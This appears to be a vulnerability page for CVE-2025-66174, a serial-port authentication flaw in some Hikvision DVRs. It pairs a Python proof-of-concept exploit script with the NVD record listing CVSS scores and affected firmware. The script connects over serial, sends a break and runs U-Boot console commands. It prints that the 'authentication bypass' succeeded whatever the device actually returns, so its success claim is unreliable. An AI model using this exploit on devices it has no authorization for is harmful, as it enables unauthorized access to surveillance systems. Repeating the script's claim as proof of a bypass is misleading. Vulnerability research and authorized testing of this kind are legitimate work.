CVE-2025-66174

#!/usr/bin/env python3 """ CVE-2025-66174 PoC - Hikvision DVR/NVR Serial Port Authentication Bypass Note: This PoC demonstrates the authentication issue for authorized security testing only. Author: Security Research Reference: Hikvision Security Advisory """ import serial import time import sys def exploit_serial_vulnerability(target_device='/dev/ttyUSB0', baudrate=115200): """ Exploit improper authentication in Hikvision DVR serial port. Args: target_device: Serial device path baudrate: Baud rate for serial communication (typically 115200 for Hikvision) Returns: bool: True if exploitation successful """ try: # Initialize serial connection ser = serial.Serial( port=target_device, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=1 ) print(f"[*] Connecting to {target_device} at {baudrate} baud...") time.sleep(2) # Clear serial buffer ser.reset_input_buffer() ser.reset_output_buffer() # Send break signal to trigger serial console ser.send_break(duration=0.25) time.sleep(1) # Read initial response response = ser.read(1024).decode('utf-8', errors='ignore') print(f"[*] Received: {response}") # Due to improper authentication, direct command execution is possible # Common Hikvision U-Boot commands commands = [ 'help', # Show available commands 'printenv', # Print environment variables 'version', # Show version info ] for cmd in commands: print(f"[*] Sending command: {cmd}") ser.write(f"{cmd}\n".encode()) time.sleep(0.5) response = ser.read(1024).decode('utf-8', errors='ignore') print(f"[*] Response:\n{response}") ser.close() print("[+] Exploitation completed - authentication bypass successful") return True except serial.SerialException as e: print(f"[-] Serial connection error: {e}") return False except Exception as e: print(f"[-] Unexpected error: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-66174.py <serial_device>") print("Example: python3 cve-2025-66174.py /dev/ttyUSB0") sys.exit(1) target = sys.argv[1] exploit_serial_vulnerability(target) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66174", "sourceIdentifier": "[email protected]", "published": "2025-12-19T07:16:01.817", "lastModified": "2025-12-23T21:45:04.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an improper authentication vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and run a series of commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "E24B2885-8FBF-4738-8C7A-1C8DB3823EE5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "8104E12A-CD97-4F8F-9A76-8CD308B9F98A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "6DA771B5-1C67-4A32-90B2-A7E0E9C194F7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF801EB-DDBF-44C6-84BB-9D903FEBEAC8"}]}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}